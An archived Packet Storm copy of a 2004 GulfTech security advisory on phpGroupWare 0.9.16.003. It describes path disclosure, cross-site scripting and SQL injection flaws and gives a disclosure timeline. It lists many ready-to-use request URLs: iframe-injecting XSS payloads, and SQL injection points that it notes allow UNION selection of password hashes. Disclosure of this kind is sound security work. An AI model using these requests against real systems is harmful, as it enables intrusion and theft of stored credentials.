what you don't know can hurt you

phpGroupWare.txt

phpGroupWare.txt
Posted Dec 30, 2004
Authored by James Bercegay | Site gulftech.org

phpGroupWare version 0.9.16.003 is susceptible to full path disclosure, cross site scripting, and SQL injection attacks. Exploitation provided.

tags | exploit, xss, sql injection
MD5 | 8889f85e8f28423e6ef44a2548455b0c

phpGroupWare.txt

Change Mirror Download


##########################################################
# GulfTech Security Research December 14th, 2004
##########################################################
# Vendor : phpGroupWare
# URL : http://www.phpgroupware.org
# Version : phpGroupWare 0.9.16.003
# Risk : Multiple Vulnerabilities
##########################################################

Description:
phpGroupWare (formerly known as webdistro) is a multi-user
groupware suite written in PHP. It provides a Web-based calendar,
todo-list, addressbook, email, news headlines, and a file manager.
The calendar supports repeating events. The email system supports
inline graphics and file attachments. The system as a whole supports
user preferences, themes, user permissions, multi-language support,
an advanced API, and user groups. phpGroupWare is included with some
Linux distributions.



Path Disclosure:
phpGroupWare allows for full path disclosure. This issue can take
place in more than one way. One example that will trigger the path
disclosure is by appending junk (such as metacharacters) to the end
of a session id. Below are two other examples

http://host/phpgroupware/preferences/preferences.php?appname=blah
http://host/phpgroupware/index.php?menuaction=blah

This will reveal the full physical path of the web directory, and
could possibly aid a would be attacker. The other example of path
disclosure can be triggered by specifying an invalid menu item.



Cross Site Scripting:
Cross Site Scripting takes place in multiple places in phpGroupWare.
Below are some examples.

http://host/phpgroupware/wiki/index.php?kp3=99884d8a63791f406585913d74476b11
%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.post&type=new%22
%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=202%22%
3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&forum_id=3%
22%3E%3Ciframe%3E&msg=202
http://host/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=42&pos=
10%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=preferences.uicategories.index
&cats_app=%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=preferences.uicategories.edit&
cats_app=notes&extra=&global_cats=True&cats_level=True&cat_parent=188&cat_id
=188%22%3E%3Ciframe%3E
http://host/phpgroupware/index.php?menuaction=email.uimessage.message&msgbal
l[msgnum]=1%22%3E%3Ciframe%3E&msgball[folder]=INBOX.hello&msgball[acctnum]=0
&sort=1&order=1&start=0
http://host/phpgroupware/index.php?menuaction=email.uicompose.compose&fldbal
l[folder]=INBOX.hello&fldball[acctnum]=0&to=%22%3E%3Ciframe%3E&personal=&sor
t=1&order=1&start=0
http://host/phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Cif
rame%3E

These Cross Site Scripting issues could allow an attacker to possibly
gather sensitive information from a victim, and execute arbitrary client
side code in the context of the victim's browser.



SQL Injection:
phpGrouWare has several SQL Injection holes. Some are not bad, some are
a bit unorthadox, and a few are dangerous. One example of a kinda unorthadox

SQL Injection is in the Trouble Ticket system. If an attacker requests a url

like this:

http://host/phpgroupware/tts/viewticket_details.php?ticket_id=355[SQL_QUERY]

nothing will happen, but as soon as you save the ticket you are allowed to
influence a SELECT query which could be very bad. Some more examples of the
not so dangerous SQL Injection issues are:

http://host/phpgroupware/index.php?menuaction=todo.ui.show_list&order=[SQL_Q
UERY]&sort=ASC&filter=&qfield=&start=&query=
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.list_proje
cts&order=[SQL_QUERY]&sort=ASC&filter=&qfield=&start=&query=&pro_main=&actio
n=mains

It should be noted that other parts of this query can be tampered with also,

such as the sort fields etc. Now for some examples of the more dangerous
issues that let you influence the query right in the middle of a SELECT
statement.

http://host/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
ct&pro_main=31&action=subs&project_id=32[SQL_QUERY]
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
ct&pro_main=31[SQL_QUERY]&action=subs&project_id=32
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
ct&pro_main=31&action=subs&project_id=32[SQL_QUERY]&domain=default
http://host/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
ct&pro_main=31[SQL_QUERY]&action=subs&project_id=32&domain=default&494fbb
http://host/phpgroupware/index.php?menuaction=projects.uiprojecthours.view_h
ours&project_id=32&pro_parent=&action=subs&hours_id=26[SQL_QUERY]&domain=def
ault

You can use these particular examples to UNION select info from the database
with
little effort required. This can be bad when password hashes start getting
pulled
by an attacker, or other sensitive data. I will release my proof of concepts
for
phpGroupWare once the updated version is available.



Notes:
All of the example url's had the session id, click history, and kp3
variables
removed except where they were part of one of the examples. I also wrapped a
few of the above examples for readability.



Solution:
I was able to speak to one of the lead developers via IRC on September 25th,
2004. I made the developer aware of the vulnerabilities, and held off on
publishing my findings for a couple of months. I have not been able to get
in
touch with any developers for some weeks now, so I publish my finding in
hopes
that the community will present a fix :)



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00054-12142004



Credits:
James Bercegay of the GulfTech Security Research Team

--
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.5.0 - Release Date: 12/9/2004


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close